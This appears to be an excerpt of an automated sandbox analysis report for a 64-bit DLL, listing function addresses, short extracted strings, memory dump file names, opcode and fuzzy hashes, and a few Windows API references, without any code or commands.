Download Yara Rule

Strings

WFY, xrefs: 0000000180019901
2`, xrefs: 00000001800198E0
XS, xrefs: 00000001800199A3

Memory Dump Source

Source File: 00000000.00000002.262741356.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd

Yara matches

Similarity

API ID:
String ID: 2`$XS$WFY
API String ID: 0-4220438673
Opcode ID: 4214e4b7748eee943712e52e0a0b26d526995497c398dca3acb8c82fd8363403
Instruction ID: 1a3a2533c7ad1ec2e7205bdb6f80c12431c695e37eabcbb0c696e965016089c0
Opcode Fuzzy Hash: 4214e4b7748eee943712e52e0a0b26d526995497c398dca3acb8c82fd8363403
Instruction Fuzzy Hash: 68215AB46087848FD388DF28D04941BBBE1BB88358F414B2DF4CAA7260D7789A54CF4A

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD14671910 Relevance: 3.2, APIs: 2, Instructions: 232COMMONLIBRARYCODE

Download Yara Rule

APIs

_clrfp.LIBCMT ref: 00007FFD14671B5F
RaiseException.KERNEL32 ref: 00007FFD14671B70

Memory Dump Source

Source File: 00000000.00000002.264769002.00007FFD14661000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFD14660000, based on PE: true

Associated: 00000000.00000002.264760756.00007FFD14660000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.264838917.00007FFD14698000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.265068777.00007FFD146DE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.265077615.00007FFD146E2000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.265084016.00007FFD146E5000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.265090984.00007FFD146E7000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd14660000_loaddll64.jbxd

Similarity

API ID: ExceptionRaise_clrfp
String ID:
API String ID: 15204871-0
Opcode ID: 327b7a6c132c00c2e162c9657ffb3d47e3a234bedabc651e6bde2b282c1ec227
Instruction ID: 3bce1efbd78fb729bb8fb0ace8543426471071b648e62eab67fb6ae419ad49e6
Opcode Fuzzy Hash: 327b7a6c132c00c2e162c9657ffb3d47e3a234bedabc651e6bde2b282c1ec227
Instruction Fuzzy Hash: 3EB14B77600B89CBEB15CF29C8922A877A1F786F5DF18C922DA5D877A4CB39D851C700

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD14679410 Relevance: 3.1, APIs: 2, Instructions: 60encryptionCOMMON

Download Yara Rule

APIs

CryptStringToBinaryA.CRYPT32 ref: 00007FFD14679465

Memory Dump Source

Source File: 00000000.00000002.264769002.00007FFD14661000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFD14660000, based on PE: true

Associated: 00000000.00000002.264760756.00007FFD14660000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.264838917.00007FFD14698000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.265068777.00007FFD146DE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.265077615.00007FFD146E2000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.265084016.00007FFD146E5000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.265090984.00007FFD146E7000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd14660000_loaddll64.jbxd

Similarity

API ID: BinaryCryptString
String ID:
API String ID: 80407269-0
Opcode ID: 2f5e26cf3e0217929738c2aa1eb9f506f6dc2ef2b5635523749955393274f26c
Instruction ID: 923dd2e36c348c86963c0dc8fa7bdad2295cf1a58d54077afd5c47f5d5ec18c1
Opcode Fuzzy Hash: 2f5e26cf3e0217929738c2aa1eb9f506f6dc2ef2b5635523749955393274f26c
Instruction Fuzzy Hash: DE213D32708F4586FB50CF25E49076AB7E1F7867A8F004025EA8D83B69CF7DD4488B00

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180010954 Relevance: 2.9, Strings: 2, Instructions: 410COMMON

Download Yara Rule

Strings

d9(4, xrefs: 00000001800109F6
Y6}, xrefs: 0000000180010ADE

Memory Dump Source

Source File: 00000000.00000002.262741356.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd

Yara matches

Similarity

API ID:
String ID: Y6}$d9(4
API String ID: 0-3330832364
Opcode ID: b043fa54239bd32b140c4ade51c25e42e7665cf50e01dff0b3be8c5be184675f
Instruction ID: aff03ef72771b13b87f2cc74d6bb077380ea2266c6580fb6b6b65536942d94d8
Opcode Fuzzy Hash: b043fa54239bd32b140c4ade51c25e42e7665cf50e01dff0b3be8c5be184675f
Instruction Fuzzy Hash: CB12087090470DEFDB98CF68C49AA9EBBF1FB48344F40816DE849AB290D7749A59CB41

Uniqueness

Uniqueness Score: -1.00%

Function 000000018001308C Relevance: 2.8, Strings: 2, Instructions: 302COMMON

Download Yara Rule

Strings

?T~, xrefs: 00000001800132DA
LPX, xrefs: 0000000180013275

Memory Dump Source

Source File: 00000000.00000002.262741356.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd

Yara matches

Similarity

API ID:
String ID: ?T~$LPX
API String ID: 0-3819494200
Opcode ID: 5371fcae6a6dea951bf7840fb42d0654fda63255fe2b3c817271c2b7c944b8ce
Instruction ID: 5bcc9d51a0cb75c4178e46190e4acf5e718f13166394170a7e92e99ce26cb4c6
Opcode Fuzzy Hash: 5371fcae6a6dea951bf7840fb42d0654fda63255fe2b3c817271c2b7c944b8ce
Instruction Fuzzy Hash: FCE109B1A0870C9FDF99DFA8D48A6DDBBF1FB58384F00411AE406B7290DB749909CB95

Uniqueness

Uniqueness Score: -1.00%

Function 00000001800257B4 Relevance: 2.7, Strings: 2, Instructions: 219COMMON

Download Yara Rule

Strings

K>DO, xrefs: 0000000180025A9D
5]w, xrefs: 0000000180025AE4

Memory Dump Source

Source File: 00000000.00000002.262741356.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd

Yara matches

Similarity

API ID:
String ID: 5]w$K>DO
API String ID: 0-1721466923
Opcode ID: 93887384d1e3e316060a719fa74046c8221635d2d4d23715a552f7898b76f6a5
Instruction ID: 7ff9c6c976455071c2a9df6d60b89cf37126c55da19abf4d4cee6ceb2b958208
Opcode Fuzzy Hash: 93887384d1e3e316060a719fa74046c8221635d2d4d23715a552f7898b76f6a5
Instruction Fuzzy Hash: 0BB1227550234CCBEBA9DF68D1CA6DD7BE1EF24344F104019FC5A9A2A2C774D929CB48

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180023D28 Relevance: 2.7, Strings: 2, Instructions: 218COMMON

Download Yara Rule

Strings

lqCn, xrefs: 0000000180023E96
m[l, xrefs: 0000000180023E02

Memory Dump Source

Source File: 00000000.00000002.262741356.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd

Yara matches

Similarity

API ID:
String ID: lqCn$m[l
API String ID: 0-3128696216
Opcode ID: 4c7d10dd5693097ca8244591837128d2cd95e17d02ebbf0952c9b834f9068715
Instruction ID: 4deb5b9ca544bed4c7e5f99d3a15c07392b613d523b2cda5bb59967198a77625
Opcode Fuzzy Hash: 4c7d10dd5693097ca8244591837128d2cd95e17d02ebbf0952c9b834f9068715
Instruction Fuzzy Hash: CCB11571400709CFDB98CF28C58AADD3BA0FF58358F82422AFD09972A0D774DA59CB49

Uniqueness

Uniqueness Score: -1.00%

Function 00000001800110AC Relevance: 2.7, Strings: 2, Instructions: 217COMMON

Download Yara Rule

Strings

U, xrefs: 00000001800113BA
Nt, xrefs: 0000000180011290

Memory Dump Source

Source File: 00000000.00000002.262741356.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd

Yara matches

Similarity

API ID:
String ID: Nt$U
API String ID: 0-2773090818
Opcode ID: 75f2b5d32e15d85487eb668497678b5eb0055a4daa499d447cf193525b22889b
Instruction ID: 45fe5b86ad995d4d9c8212a5c7c68854cc0b5cbfbb722d6ff257206196d8d1d1
Opcode Fuzzy Hash: 75f2b5d32e15d85487eb668497678b5eb0055a4daa499d447cf193525b22889b
Instruction Fuzzy Hash: FAA1E4B05047888FEB58DF68D8866D93FA1FB48398F11421DFC8AA72A0D778D945CBC5

Uniqueness

Uniqueness Score: -1.00%

Function 000000018000FF64 Relevance: 2.7, Strings: 2, Instructions: 192COMMON

Download Yara Rule

Strings

#X, xrefs: 00000001800101A3
Us, xrefs: 00000001800102A7

Memory Dump Source

Source File: 00000000.00000002.262741356.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd

Yara matches

Similarity

API ID:
String ID: #X$Us
API String ID: 0-3203413852
Opcode ID: 927f4b49d76b73256ea5c740f2e30509fd742bc0798702765f896e21c4c8ed3c
Instruction ID: 41232c5cd5cce4775d7c49e7c64c552743a4e7719aa725caeeb3acb0d5dfb118
Opcode Fuzzy Hash: 927f4b49d76b73256ea5c740f2e30509fd742bc0798702765f896e21c4c8ed3c
Instruction Fuzzy Hash: 54B167B590070DCFEB98DF28C18A59D3BA9FF55308F404129FC1E962A1E3B8E518CB56

Uniqueness

Uniqueness Score: -1.00%

Function 000000018001FB88 Relevance: 2.7, Strings: 2, Instructions: 164COMMON

Download Yara Rule

Strings

tt", xrefs: 000000018001FCF1
%R, xrefs: 000000018001FBFE

Memory Dump Source

Source File: 00000000.00000002.262741356.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd

Yara matches

Similarity

API ID:
String ID: %R$tt"
API String ID: 0-772664118
Opcode ID: cdb4b53f2f09b2303a41a9c0704183505d0985f12a48c0c3b60d1fd3dd25ac21
Instruction ID: 8fbc46d1b7e2f611e930d46153dfa18b699fa5ceb3b757a8db7b1acf46b52deb
Opcode Fuzzy Hash: cdb4b53f2f09b2303a41a9c0704183505d0985f12a48c0c3b60d1fd3dd25ac21
Instruction Fuzzy Hash: 09813C7051474D8BDF98CF28C8896ED3BA0FB48398F565319FD4AA6390CB78D585CB84

Uniqueness

Uniqueness Score: -1.00%

Function 000000018000BA24 Relevance: 2.7, Strings: 2, Instructions: 152COMMON

Download Yara Rule

Strings

y, xrefs: 000000018000BC4B
5t%, xrefs: 000000018000BA9E

Memory Dump Source

Source File: 00000000.00000002.262741356.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd

Yara matches

Similarity

API ID:
String ID: 5t%$y
API String ID: 0-493594994
Opcode ID: 6f0e00c9ead975cfaf4ea2e77c512cc28932c103f1f544ab72cc7830bdf191ce
Instruction ID: 6792571393c1fc0b2eb6fbc5ae81dec58a59b384453640eb5fb68cdcf9e85be0
Opcode Fuzzy Hash: 6f0e00c9ead975cfaf4ea2e77c512cc28932c103f1f544ab72cc7830bdf191ce
Instruction Fuzzy Hash: AA918BB190078ECFDB58CF68C84A5CE7BB0FB14358F404A19F866962A0D3B4DA65CF95

Uniqueness

Uniqueness Score: -1.00%

Function 00000001800096B8 Relevance: 2.6, Strings: 2, Instructions: 147COMMON

Download Yara Rule

Strings

1e, xrefs: 00000001800096D8
f<$F, xrefs: 0000000180009875

Memory Dump Source

Source File: 00000000.00000002.262741356.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd

Yara matches

Similarity

API ID:
String ID: 1e$f<$F
API String ID: 0-2724976541
Opcode ID: 1d95138f6fdf08470e8f176c0dd76d9716459aa4dede15dc4b9a20d9c628de90
Instruction ID: bed1062ba2242fdda31b79b65a0af6ec507006944e588aaef166d9663dde45ee
Opcode Fuzzy Hash: 1d95138f6fdf08470e8f176c0dd76d9716459aa4dede15dc4b9a20d9c628de90
Instruction Fuzzy Hash: 1971197010468CABEBBACF68C8997D937A0FB48348F50861DE90D8E290DF749B49DB01

Uniqueness

Uniqueness Score: -1.00%

Function 00000001800084F8 Relevance: 2.6, Strings: 2, Instructions: 146COMMON

Download Yara Rule

Strings

Y", xrefs: 000000018000860B
L, xrefs: 00000001800086D6

Memory Dump Source

Source File: 00000000.00000002.262741356.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd

Yara matches

Similarity

API ID:
String ID: L$Y"
API String ID: 0-1467774553
Opcode ID: 2c48c4371220eb54a9ab09e752dd04f6ad79d49a1bf6e2c0c73efc3286d8c696
Instruction ID: b3e18f2d7fd9a4b9b80f79599815d3f82c5d11737bc9d592f484fdbe236454d7
Opcode Fuzzy Hash: 2c48c4371220eb54a9ab09e752dd04f6ad79d49a1bf6e2c0c73efc3286d8c696
Instruction Fuzzy Hash: CB61267151074D9FDB88CF28C8C9AC97BA1FB483A8F55A218FC0A97255C7B4D885CF85

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180024680 Relevance: 2.6, Strings: 2, Instructions: 128COMMON

Download Yara Rule

Strings

Sa, xrefs: 00000001800283E3
y&, xrefs: 00000001800246FF

Memory Dump Source

Source File: 00000000.00000002.262741356.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd

Yara matches

Similarity

API ID:
String ID: Sa$y&
API String ID: 0-700414750
Opcode ID: 20d9025a8a3505d7d31e7295bad198ad76a83a447a1e61e4b9726380a692546c
Instruction ID: dfee43bf4d265d3107084244710d0931b241e98621e1a28360d7d5c9830a69e6
Opcode Fuzzy Hash: 20d9025a8a3505d7d31e7295bad198ad76a83a447a1e61e4b9726380a692546c
Instruction Fuzzy Hash: 6551007061C7848FD7A8DF28C18675BBBF0FBDA704F004A1DE689C7261D77699458B42

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180028690 Relevance: 2.6, Strings: 2, Instructions: 115COMMON

Download Yara Rule

Strings

, N, xrefs: 00000001800287E1
0gL, xrefs: 000000018002880D

Memory Dump Source

Source File: 00000000.00000002.262741356.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd

Yara matches

Similarity

API ID:
String ID: , N$0gL
API String ID: 0-3996470819
Opcode ID: f2532db71947988c01e260eeb170c32121aeeb8cf32307669213a599370f11e8
Instruction ID: e6cd01448f2141974011cda714a22c6421916980406a2c47b20c1b92061da8ef
Opcode Fuzzy Hash: f2532db71947988c01e260eeb170c32121aeeb8cf32307669213a599370f11e8
Instruction Fuzzy Hash: 2551C470500BCCCBEBBACF54CC8D7DA3BA1BB98305F104619D94A9E790DB795648CB41

Uniqueness

Uniqueness Score: -1.00%

Function 00000001800148B0 Relevance: 2.6, Strings: 2, Instructions: 100COMMON

Download Yara Rule

Strings

G`OV, xrefs: 0000000180014A14
1/, xrefs: 000000018001498D

Memory Dump Source

Source File: 00000000.00000002.262741356.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd

Yara matches

Similarity

API ID:
String ID: 1/$G`OV
API String ID: 0-3929948944
Opcode ID: d62949ad0294063053f77de7a54004d2a4a62d647e2eb2b3cc8fcc7dd014da9b
Instruction ID: 31e3bcd664d6a8acacbd44d2cd4791fc9ee9cbc125b163ac38e43a9671c391af
Opcode Fuzzy Hash: d62949ad0294063053f77de7a54004d2a4a62d647e2eb2b3cc8fcc7dd014da9b
Instruction Fuzzy Hash: E241177050CB848BDBB8DF28D48579AB7E1FB98304F908A1EE88DC7351DB749588CB46

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180014FA4 Relevance: 2.6, Strings: 2, Instructions: 99COMMON

Download Yara Rule

Strings

2V, xrefs: 00000001800150AE
W5, xrefs: 00000001800150D1

Memory Dump Source

Source File: 00000000.00000002.262741356.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd

Yara matches

Similarity

API ID:
String ID: 2V$W5
API String ID: 0-1873325321
Opcode ID: 2cac5ebb664ebc0649a93560a62f559e178364f761da87e25be392b8304fa33a
Instruction ID: 63ef17b550405aac1bd81048b7740241b15b08bd30737758e2ae9d54adb6feaa
Opcode Fuzzy Hash: 2cac5ebb664ebc0649a93560a62f559e178364f761da87e25be392b8304fa33a
Instruction Fuzzy Hash: 1741C3B190074A8BDB48DF24C4965DE7FB1FB68398F10421DFC5A9A290D3B8D6A4CBD4

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180001000 Relevance: 2.6, Strings: 2, Instructions: 97COMMON

Download Yara Rule

Strings

ANSk, xrefs: 000000018000109F
oB#x, xrefs: 0000000180001159

Memory Dump Source

Source File: 00000000.00000002.262741356.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd

Yara matches

Similarity

API ID:
String ID: ANSk$oB#x
API String ID: 0-2811520726
Opcode ID: 113bf255f30907f85ca083131261c133160d8791ed09c7962e46f1e4aa7aeec8
Instruction ID: d26c3f383fa39858f36e8a1a25e13c9e437254a393a26a1cbff70abbe494b10c
Opcode Fuzzy Hash: 113bf255f30907f85ca083131261c133160d8791ed09c7962e46f1e4aa7aeec8
Instruction Fuzzy Hash: E141E2B090078E8FDF48CF68C8865DE7BB0FB48358F50461DFC56A6290D3B49664CB85

Uniqueness

Uniqueness Score: -1.00%

Function 000000018002005C Relevance: 2.6, Strings: 2, Instructions: 95COMMON

Download Yara Rule

Strings

3, xrefs: 0000000180020119
(B, xrefs: 000000018002015C

Memory Dump Source

Source File: 00000000.00000002.262741356.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd

Yara matches

Similarity

API ID:
String ID: (B$3
API String ID: 0-3108688774
Opcode ID: ae8899e9af14a8bd0728e043f2f3e6ee9a39677d1fd67c8acad13cfb8091b350
Instruction ID: 4d52e68c3b5894455c2b855b72f500be9282249362062767deb9202ab9d457a9
Opcode Fuzzy Hash: ae8899e9af14a8bd0728e043f2f3e6ee9a39677d1fd67c8acad13cfb8091b350
Instruction Fuzzy Hash: 2D41B2706087408BE758DF28C18955BBBF1BBC9744F104A1DFA968B3A0DB75D945CF82

Uniqueness

Uniqueness Score: -1.00%

Function 000000018001FA08 Relevance: 2.6, Strings: 2, Instructions: 93COMMON

Download Yara Rule

Strings

\I, xrefs: 000000018001FA24
6`, xrefs: 000000018001FAB8

Memory Dump Source

Source File: 00000000.00000002.262741356.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd

Yara matches

Similarity

API ID:
String ID: 6`$\I
API String ID: 0-4113516648
Opcode ID: c820624380164a86f4011e9cac2eee3e4169805a9087f8d545a9fc14e305f8a8
Instruction ID: 87e2cadb684af144f703d936105f11dfb57f24fa6abc88236f5ea505cb77e2af
Opcode Fuzzy Hash: c820624380164a86f4011e9cac2eee3e4169805a9087f8d545a9fc14e305f8a8
Instruction Fuzzy Hash: 4641F77190070D8BDF48DF68C58A5DD7FB0FB483A8F2A621DE80AB6260D7759585CB88

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180009144 Relevance: 2.6, Strings: 2, Instructions: 85COMMON

Download Yara Rule

Strings

pr, xrefs: 00000001800091CC
'7, xrefs: 0000000180009152

Memory Dump Source

Source File: 00000000.00000002.262741356.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd

Yara matches

Similarity

API ID:
String ID: '7$pr
API String ID: 0-1984906187
Opcode ID: 056c662d811a8c845d4963eb3dfda1ff298b6ec1510e4f1f57fedda2cc0e9922
Instruction ID: a51af08d5e019336a09e0604cbee0951de86a06f6bb7dc6101bcf2cec172da0b
Opcode Fuzzy Hash: 056c662d811a8c845d4963eb3dfda1ff298b6ec1510e4f1f57fedda2cc0e9922
Instruction Fuzzy Hash: A031C2B05187818BD358CFA8C48A51AFBF5BBC6344F104A1DF9C2866A0D7F5D946CB42

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180006880 Relevance: 2.6, Strings: 2, Instructions: 80COMMON

Download Yara Rule

Strings

KrTD, xrefs: 000000018000691E
_D, xrefs: 00000001800068FA

Memory Dump Source

Source File: 00000000.00000002.262741356.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd

Yara matches

Similarity

API ID:
String ID: KrTD$_D
API String ID: 0-934927992
Opcode ID: e1601d4e70e378c5a6ecebcd8442673b18ca16eef11f20bd0ff53c9d04a0e76b
Instruction ID: 79f0e27b47198620a76255f61a383142c91a704a78014043126b857d0cce2a1e
Opcode Fuzzy Hash: e1601d4e70e378c5a6ecebcd8442673b18ca16eef11f20bd0ff53c9d04a0e76b
Instruction Fuzzy Hash: 54316D716187818BD748DF28C05A42ABBE1FB9D30CF444B1DF8CAA6291D7789615CB4A

Uniqueness

Uniqueness Score: -1.00%

Function 000000018000C498 Relevance: 2.6, Strings: 2, Instructions: 77COMMON

Download Yara Rule

Strings

A%9{, xrefs: 000000018000C57D
V, xrefs: 000000018000C4F9

Memory Dump Source

Source File: 00000000.00000002.262741356.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd

Yara matches

Similarity

API ID:
String ID: A%9{$V
API String ID: 0-1820082490
Opcode ID: 625af2db419091958e7d4df6c25d7188c91703984e83660915dca7ebc696b449
Instruction ID: 03f72db5704a5358c6f1172bde4b1415201ccefee93438e503f81867a50f7b44
Opcode Fuzzy Hash: 625af2db419091958e7d4df6c25d7188c91703984e83660915dca7ebc696b449
Instruction Fuzzy Hash: E941A2B180038E8FDF48DF64D8865CE7FF4FB48348F114619E859AA250D3B8D694CB85

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180001A1C Relevance: 2.6, Strings: 2, Instructions: 76COMMON

Download Yara Rule

Strings

(, xrefs: 0000000180001A33
>>, xrefs: 0000000180001AD9

Memory Dump Source

Source File: 00000000.00000002.262741356.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd

Yara matches

Similarity

API ID:
String ID: ($>>
API String ID: 0-1145299130
Opcode ID: bfec8586a8ac1bda717ee4d3e998b35be4f018f17ebb2d31d060e621415d9480
Instruction ID: 87f9655775df96d3def6b8efa86b2c726d5a06aaa2b0f8cf4872ed89fb5ea4fb
Opcode Fuzzy Hash: bfec8586a8ac1bda717ee4d3e998b35be4f018f17ebb2d31d060e621415d9480
Instruction Fuzzy Hash: FF31D3B190074E8BDF48CF64C88A1DE7FB0FB58358F24461DE946A6290D3B8D6A4CBC5

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180027348 Relevance: 2.6, Strings: 2, Instructions: 76COMMON

Download Yara Rule

Strings

bv, xrefs: 0000000180027354
f, xrefs: 000000018002739A

Memory Dump Source

Source File: 00000000.00000002.262741356.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd

Yara matches

Similarity

API ID:
String ID: bv$f
API String ID: 0-3039744445
Opcode ID: 46d2aa2ebc9209d71c82958834864fb94c0878401221f978366f9a402f9450e9
Instruction ID: 5cd7742688e295825d2d7ad71e75fb66b1b5906d5501222e705b32419eb79afe
Opcode Fuzzy Hash: 46d2aa2ebc9209d71c82958834864fb94c0878401221f978366f9a402f9450e9
Instruction Fuzzy Hash: 0E41B17091438A8FDB49CF68D84A5DE7FF0FB58348F104A29F86AA6250D3B4D664CF85

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180004CA0 Relevance: 2.6, Strings: 2, Instructions: 71COMMON

Download Yara Rule

Strings

mV5, xrefs: 0000000180004D66
*!#, xrefs: 0000000180004CBA

Memory Dump Source

Source File: 00000000.00000002.262741356.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd

Yara matches

Similarity

API ID:
String ID: *!#$mV5
API String ID: 0-2993575305
Opcode ID: 4245992fb973f88090a409a267d2f85edccab32cf52bd4f60c75fea94f1a4a84
Instruction ID: f4257f88e51e2467cedc4a109958e0d61b2de26f6874c0326167d1c9068f5517
Opcode Fuzzy Hash: 4245992fb973f88090a409a267d2f85edccab32cf52bd4f60c75fea94f1a4a84
Instruction Fuzzy Hash: 0931C4B150038E8BDB48CF28C94A5DE7BB0FB58358F014A19FC6696290D7B8D665CFC4

Uniqueness

Uniqueness Score: -1.00%

Function 00000001800099EC Relevance: 2.6, Strings: 2, Instructions: 68COMMON

Download Yara Rule

Strings

l^jf, xrefs: 0000000180009A95
`{, xrefs: 0000000180009AD7

Memory Dump Source

Source File: 00000000.00000002.262741356.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd

Yara matches

Similarity

API ID:
String ID: `{$l^jf
API String ID: 0-1869605660
Opcode ID: 28521cbd4e872c1ef803d1df5e8c14565f9c4bc258fc16fe96f59b7c9f67bd2e
Instruction ID: eb540d20a08f5e40d8c0ff40e11836e8ded1822f40ca17c0ef14950dbd3fc5a0
Opcode Fuzzy Hash: 28521cbd4e872c1ef803d1df5e8c14565f9c4bc258fc16fe96f59b7c9f67bd2e
Instruction Fuzzy Hash: D1317FB162D784AFD388DF28D49591ABBE0FB88354F806A1DF8868B290D775D855CB02

Uniqueness

Uniqueness Score: -1.00%

Function 000000018001F550 Relevance: 2.6, Strings: 2, Instructions: 62COMMON

Download Yara Rule

Strings

-, xrefs: 000000018001F618
2-, xrefs: 000000018001F560

Memory Dump Source

Source File: 00000000.00000002.262741356.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd

Yara matches

Similarity

API ID:
String ID: 2-$-
API String ID: 0-2034864362
Opcode ID: 20bbbdbc3827e50294dde3ee49f0cdd293043f0a077c143f70453fda15f8f7c4
Instruction ID: 4005107032f2b12f9f607655d62483a8781f58ab60f16824121cd48537e79645
Opcode Fuzzy Hash: 20bbbdbc3827e50294dde3ee49f0cdd293043f0a077c143f70453fda15f8f7c4
Instruction Fuzzy Hash: CC317FB190078E8FDF48DF68C84A59A7BB0FB18318F414A1AFC6996254D3B4CA64CBD4

Uniqueness

Uniqueness Score: -1.00%

Function 000000018000EAC4 Relevance: 2.6, Strings: 2, Instructions: 61COMMON

Download Yara Rule

Strings

<&, xrefs: 000000018000EB86
q/, xrefs: 000000018000EACC

Memory Dump Source

Source File: 00000000.00000002.262741356.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd

Yara matches

Similarity

API ID:
String ID: <&$q/
API String ID: 0-2233190826
Opcode ID: 15a5214ead44a1f0762e7863b7fdc3010a0d9091678656a87e304455b9a574ab
Instruction ID: 34f360e2f025a71cd2e5aa73a3d426e5d18a321659368207a0a8d8f01dd344ad
Opcode Fuzzy Hash: 15a5214ead44a1f0762e7863b7fdc3010a0d9091678656a87e304455b9a574ab
Instruction Fuzzy Hash: EE319CB0508B888BE759DF25C48A50BBBF2FBC5788F200A1DF292867A0D775D549CF42

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180011664 Relevance: 2.6, Strings: 2, Instructions: 57COMMON

Download Yara Rule

Strings

g%, xrefs: 0000000180011703
?P>, xrefs: 00000001800116D2

Memory Dump Source

